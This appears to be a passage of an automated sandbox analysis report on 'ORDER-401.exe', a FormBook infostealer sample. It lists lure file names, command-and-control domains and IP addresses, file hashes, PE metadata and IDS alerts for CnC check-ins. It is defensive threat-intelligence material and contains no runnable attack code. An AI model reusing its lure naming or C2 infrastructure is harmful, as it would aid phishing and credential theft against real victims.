                                                                  Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • www.beyondfitness.live/fbpt/
                                                                  specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • www.gadgetre.info/8q8w/

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  www.learnwithus.sitePO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                  • 209.74.77.107
                                                                  Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                  • 209.74.77.107
                                                                  Docs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • 209.74.77.107
                                                                  OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                  • 209.74.77.107
                                                                  OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                  • 209.74.77.107
                                                                  RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                  • 209.74.77.107
                                                                  all.wjscdn.com01152-11-12-24.exeGet hashmaliciousFormBookBrowse
                                                                  • 154.90.58.209
                                                                  DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                                  • 154.90.58.209
                                                                  New Order.exeGet hashmaliciousFormBookBrowse
                                                                  • 154.90.35.240
                                                                  TNT Express Delivery Consignment AWD 87993766479.vbsGet hashmaliciousFormBookBrowse
                                                                  • 38.54.112.227
                                                                  Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                                  • 154.205.159.116
                                                                  CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                  • 38.54.112.227
                                                                  CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                  • 154.90.58.209
                                                                  dns.ladipage.comSHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                  • 18.139.62.226
                                                                  CJE003889.exeGet hashmaliciousFormBookBrowse
                                                                  • 13.228.81.39
                                                                  MAERSK LINE SHIPPING DOC_4253.exeGet hashmaliciousFormBookBrowse
                                                                  • 13.228.81.39
                                                                  QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                                  • 13.228.81.39
                                                                  New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                  • 54.179.173.60
                                                                  Docs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • 18.139.62.226
                                                                  XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • 13.228.81.39
                                                                  Swift copy.exeGet hashmaliciousFormBookBrowse
                                                                  • 18.139.62.226
                                                                  wavjjT3sEq.exeGet hashmaliciousFormBookBrowse
                                                                  • 54.179.173.60
                                                                  COMMERCIAL-DOKUMEN-YANG-DIREVISI.exeGet hashmaliciousFormBookBrowse
                                                                  • 18.139.62.226
                                                                  www.expancz.topMAERSK LINE SHIPPING DOC_4253.exeGet hashmaliciousFormBookBrowse
                                                                  • 107.155.56.30
                                                                  New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                  • 107.155.56.30
                                                                  Docs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • 107.155.56.30
                                                                  XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • 107.155.56.30
                                                                  Swift copy.exeGet hashmaliciousFormBookBrowse
                                                                  • 107.155.56.30
                                                                  www.070001325.xyzMAERSK LINE SHIPPING DOC_4253.exeGet hashmaliciousFormBookBrowse
                                                                  • 161.97.142.144
                                                                  New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                  • 161.97.142.144
                                                                  Docs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • 161.97.142.144
                                                                  XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • 161.97.142.144
                                                                  Swift copy.exeGet hashmaliciousFormBookBrowse
                                                                  • 161.97.142.144

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  MULTIBAND-NEWHOPEUSRockwool-Msg-S9039587897.pdfGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                  • 209.74.95.101
                                                                  SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                  • 209.74.79.42
                                                                  Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                  • 209.74.64.187
                                                                  CJE003889.exeGet hashmaliciousFormBookBrowse
                                                                  • 209.74.79.40
                                                                  ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                                  • 209.74.79.41
                                                                  PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                  • 209.74.77.107
                                                                  Recibos.exeGet hashmaliciousFormBookBrowse
                                                                  • 209.74.77.108
                                                                  SN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                                  • 209.74.64.190
                                                                  DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                                  • 209.74.77.107
                                                                  SRT68.exeGet hashmaliciousFormBookBrowse
                                                                  • 209.74.77.107
                                                                  AMAZON-02UShttps://es-proposal.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                                  • 3.164.82.77
                                                                  http://ebaumsworld.comGet hashmaliciousUnknownBrowse
                                                                  • 34.247.233.198
                                                                  loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                  • 13.238.129.232
                                                                  loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                  • 18.255.125.141
                                                                  loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                  • 34.212.126.28
                                                                  loligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                  • 54.97.121.62
                                                                  loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                  • 18.229.68.6
                                                                  loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                  • 18.241.64.66
                                                                  loligang.arm6.elfGet hashmaliciousMiraiBrowse
                                                                  • 54.171.230.55
                                                                  https://morgans-proposal-site.webflow.io/Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                  • 13.227.9.227
                                                                  CONTABODESHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                  • 161.97.142.144
                                                                  PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                  • 161.97.142.144
                                                                  MAERSK LINE SHIPPING DOC_4253.exeGet hashmaliciousFormBookBrowse
                                                                  • 161.97.142.144
                                                                  Need Price Order No.17084 PARLOK.exeGet hashmaliciousFormBookBrowse
                                                                  • 161.97.168.245
                                                                  lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                                  • 161.97.168.245
                                                                  New quotation request.exeGet hashmaliciousFormBookBrowse
                                                                  • 161.97.168.245
                                                                  UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                  • 161.97.168.245
                                                                  sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                  • 167.86.111.146
                                                                  PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                  • 161.97.168.245
                                                                  Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                  • 161.97.168.245

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER-401.exe.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ORDER-401.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1216
                                                                  Entropy (8bit):5.34331486778365
                                                                  Encrypted:false
                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                  C:\Users\user\AppData\Local\Temp\UQ63g7r-

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\tzutil.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                  Category:dropped
                                                                  Size (bytes):196608
                                                                  Entropy (8bit):1.1209886597424439
                                                                  Encrypted:false
                                                                  SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                  MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                  SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                  SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                  SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.783853579352161
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  File name:ORDER-401.exe
                                                                  File size:762'368 bytes
                                                                  MD5:3dfa099ee923a3f449f97ca8f522f703
                                                                  SHA1:b2aece2499d5d90eb59d7e0d8a908c162d7e70f1
                                                                  SHA256:756abd1273244ba91c1b9bd7bb86182e9012e12f2599cb715f9757cc34e3a81e
                                                                  SHA512:a873640e852943458df7fee7983e79063ad06c00a80db7056f5cab0ca72ac384a5b5012b9e274e3f1a1d02fc82059b9532c27f5fc22fe2e70643e3ec2a3dccef
                                                                  SSDEEP:12288:/fsSMXtdwCUEou5+tJ5gL1OPUCaBqffDxQ4LFS7erQg3cRL7XlrGw6GABR5OiYWa:Xs+/Eovt0LYPvaBaBSCPElrGDFrMW/y
                                                                  TLSH:2FF412187A47D806CA9257341EB1F2B56BAC7EEDA801D3074FE86DEFBC26F154C48291
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Pg..............0...... ........... ........@.. ....................................@................................

                                                                  File Icon

                                                                  Icon Hash:0697f0b9b0b1d827

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x4b9eb2
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x6750ADB2 [Wed Dec 4 19:29:54 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  push ebx
                                                                  add byte ptr [ecx+00h], bh
                                                                  jnc 00007F460089C3E2h
                                                                  je 00007F460089C3E2h
                                                                  add byte ptr [ebp+00h], ch
                                                                  add byte ptr [ecx+00h], al
                                                                  arpl word ptr [eax], ax
                                                                  je 00007F460089C3E2h
                                                                  imul eax, dword ptr [eax], 00610076h
                                                                  je 00007F460089C3E2h
                                                                  outsd
                                                                  add byte ptr [edx+00h], dh
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb9e600x4f.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xba0000x1de4.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xbc0000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000xb7ed80xb8000f24124381401b68f9c5c4964a5159d9aFalse0.9235136612601902OpenPGP Secret Key7.789767866575687IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0xba0000x1de40x1e00e90c7decf45174b85a6567dbce2197caFalse0.8513020833333333data7.387110084495342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0xbc0000xc0x2003a659cc56f6bdf42041f859bae060971False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0xba1000x174ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9639624539054643
                                                                  RT_GROUP_ICON0xbb8600x14data1.05
                                                                  RT_VERSION0xbb8840x360data0.42476851851851855
                                                                  RT_MANIFEST0xbbbf40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                  Imports

                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-12-12T21:38:10.419837+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849714161.97.142.14480TCP
                                                                  2024-12-12T21:38:10.419837+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849714161.97.142.14480TCP
                                                                  2024-12-12T21:38:28.268922+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849715107.155.56.3080TCP
                                                                  2024-12-12T21:38:30.964806+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849716107.155.56.3080TCP
                                                                  2024-12-12T21:38:33.628273+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849717107.155.56.3080TCP
                                                                  2024-12-12T21:38:36.355592+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849718107.155.56.3080TCP
                                                                  2024-12-12T21:38:36.355592+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849718107.155.56.3080TCP
                                                                  2024-12-12T21:38:44.284528+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84971918.139.62.22680TCP
                                                                  2024-12-12T21:38:46.956483+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84972018.139.62.22680TCP
                                                                  2024-12-12T21:38:49.641750+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84972118.139.62.22680TCP
                                                                  2024-12-12T21:38:52.357197+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84972218.139.62.22680TCP
                                                                  2024-12-12T21:38:52.357197+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.84972218.139.62.22680TCP
                                                                  2024-12-12T21:39:07.390754+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849723209.74.77.10780TCP
                                                                  2024-12-12T21:39:10.051965+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849724209.74.77.10780TCP
                                                                  2024-12-12T21:39:12.784154+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849725209.74.77.10780TCP
                                                                  2024-12-12T21:39:15.387860+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849726209.74.77.10780TCP
                                                                  2024-12-12T21:39:15.387860+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849726209.74.77.10780TCP
                                                                  2024-12-12T21:39:22.706760+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849727154.205.159.11680TCP
                                                                  2024-12-12T21:39:25.378330+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849728154.205.159.11680TCP
                                                                  2024-12-12T21:39:28.050478+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849729154.205.159.11680TCP
                                                                  2024-12-12T21:39:30.889518+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849730154.205.159.11680TCP
                                                                  2024-12-12T21:39:30.889518+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849730154.205.159.11680TCP
                                                                  2024-12-12T21:39:37.625829+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8497313.33.130.19080TCP
                                                                  2024-12-12T21:39:40.722439+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8497323.33.130.19080TCP
                                                                  2024-12-12T21:39:42.967531+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8497333.33.130.19080TCP
                                                                  2024-12-12T21:39:45.713532+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.8497343.33.130.19080TCP
                                                                  2024-12-12T21:39:45.713532+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.8497343.33.130.19080TCP
                                                                  2024-12-12T21:39:53.867876+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84973538.46.13.5480TCP

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 12, 2024 21:38:09.051649094 CET4971480192.168.2.8161.97.142.144
                                                                  Dec 12, 2024 21:38:09.172081947 CET8049714161.97.142.144192.168.2.8
                                                                  Dec 12, 2024 21:38:09.172727108 CET4971480192.168.2.8161.97.142.144
                                                                  Dec 12, 2024 21:38:09.183099031 CET4971480192.168.2.8161.97.142.144
                                                                  Dec 12, 2024 21:38:09.303062916 CET8049714161.97.142.144192.168.2.8
                                                                  Dec 12, 2024 21:38:10.418154001 CET8049714161.97.142.144192.168.2.8
                                                                  Dec 12, 2024 21:38:10.418684006 CET8049714161.97.142.144192.168.2.8
                                                                  Dec 12, 2024 21:38:10.418700933 CET8049714161.97.142.144192.168.2.8
                                                                  Dec 12, 2024 21:38:10.419836998 CET4971480192.168.2.8161.97.142.144
                                                                  Dec 12, 2024 21:38:10.423027992 CET8049714161.97.142.144192.168.2.8
                                                                  Dec 12, 2024 21:38:10.424021959 CET4971480192.168.2.8161.97.142.144
                                                                  Dec 12, 2024 21:38:10.430664062 CET4971480192.168.2.8161.97.142.144
                                                                  Dec 12, 2024 21:38:10.550676107 CET8049714161.97.142.144192.168.2.8
                                                                  Dec 12, 2024 21:38:26.617758036 CET4971580192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:26.737797022 CET8049715107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:26.737889051 CET4971580192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:26.753129005 CET4971580192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:26.873056889 CET8049715107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:28.268922091 CET4971580192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:28.317806005 CET8049715107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:28.317904949 CET4971580192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:28.318028927 CET8049715107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:28.318077087 CET4971580192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:28.388921022 CET8049715107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:28.389051914 CET4971580192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:29.287888050 CET4971680192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:29.408747911 CET8049716107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:29.409281969 CET4971680192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:29.424287081 CET4971680192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:29.544205904 CET8049716107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:30.964806080 CET4971680192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:30.990894079 CET8049716107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:30.990958929 CET4971680192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:30.991097927 CET8049716107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:30.991141081 CET4971680192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:31.084760904 CET8049716107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:31.085036993 CET4971680192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:31.989232063 CET4971780192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:32.109402895 CET8049717107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:32.109524965 CET4971780192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:32.126044035 CET4971780192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:32.245954990 CET8049717107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:32.246341944 CET8049717107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:33.628273010 CET4971780192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:33.693423033 CET8049717107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:33.693502903 CET4971780192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:33.748598099 CET8049717107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:33.748652935 CET4971780192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:34.646922112 CET4971880192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:34.766993999 CET8049718107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:34.767266989 CET4971880192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:34.777084112 CET4971880192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:34.897036076 CET8049718107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:36.355451107 CET8049718107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:36.355465889 CET8049718107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:36.355592012 CET4971880192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:36.357352972 CET8049718107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:36.357367039 CET8049718107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:36.357422113 CET4971880192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:36.359385967 CET8049718107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:36.359400034 CET8049718107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:36.359410048 CET8049718107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:36.359445095 CET4971880192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:36.361515999 CET8049718107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:36.361530066 CET8049718107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:36.361541033 CET8049718107.155.56.30192.168.2.8
                                                                  Dec 12, 2024 21:38:36.361623049 CET4971880192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:36.361623049 CET4971880192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:36.364660025 CET4971880192.168.2.8107.155.56.30
                                                                  Dec 12, 2024 21:38:36.485364914 CET8049718107.155.56.30192.168.2.8
